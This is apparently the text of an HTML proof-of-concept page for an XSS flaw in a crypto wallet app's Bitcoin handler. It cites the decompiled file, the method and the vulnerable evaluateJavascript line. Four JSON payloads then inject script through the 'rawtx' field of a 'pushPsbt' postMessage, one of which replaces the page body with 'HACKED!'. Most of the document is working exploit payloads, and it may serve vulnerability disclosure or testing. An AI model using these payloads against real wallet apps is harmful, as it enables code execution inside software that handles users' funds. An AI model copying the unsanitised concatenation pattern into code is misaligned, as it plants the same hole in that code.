🎯 Bitcoin XSS Focused PoC
🚨 Bundle.data XSS Attack Vector
This PoC exploits the XSS vulnerability where the rawtx field from postMessage
gets stored in bundle.data and directly concatenated into JavaScript without sanitization.
🔍 Vulnerability Details
File: Hzv.java (Bitcoin protocol handler)
Method: aMV_() - lines 87, 122, 148
Vulnerable Code: huw.evaluateJavascript(navigationBarInfo + ".sendResponse(" + huw.getWeb3JsIdSign() + ",\"" + string + "\")", null);
Attack Vector: rawtx field → bundle.data → direct JavaScript concatenation
🔸 Test 1: signPsbt Method XSS
{
"id": "123",
"name": "pushPsbt",
"object": {
"rawtx": "\"); alert('XSS via signPsbt!'); //"
}
}
Test signPsbt XSS
🔸 Test 2: signPsbts Method XSS
{
"id": "123",
"name": "pushPsbt",
"object": {
"rawtx": "\"); alert('XSS via signPsbts!'); //"
}
}
Test signPsbts XSS
🔸 Test 3: Default Case XSS
{
"id": "123",
"name": "pushPsbt",
"object": {
"rawtx": "\"); alert('XSS via default case!'); //"
}
}
Test Default XSS
🔸 Test 4: Advanced XSS Payload
{
"id": "123",
"name": "pushPsbt",
"object": {
"rawtx": "\"); alert('XSS via bundle.data!'); document.body.innerHTML='
HACKED! '; //"
}
}
Test Advanced XSS
🔸 Test 5: All Methods at Once
Test All Methods
Ready to test Bitcoin XSS vulnerabilities...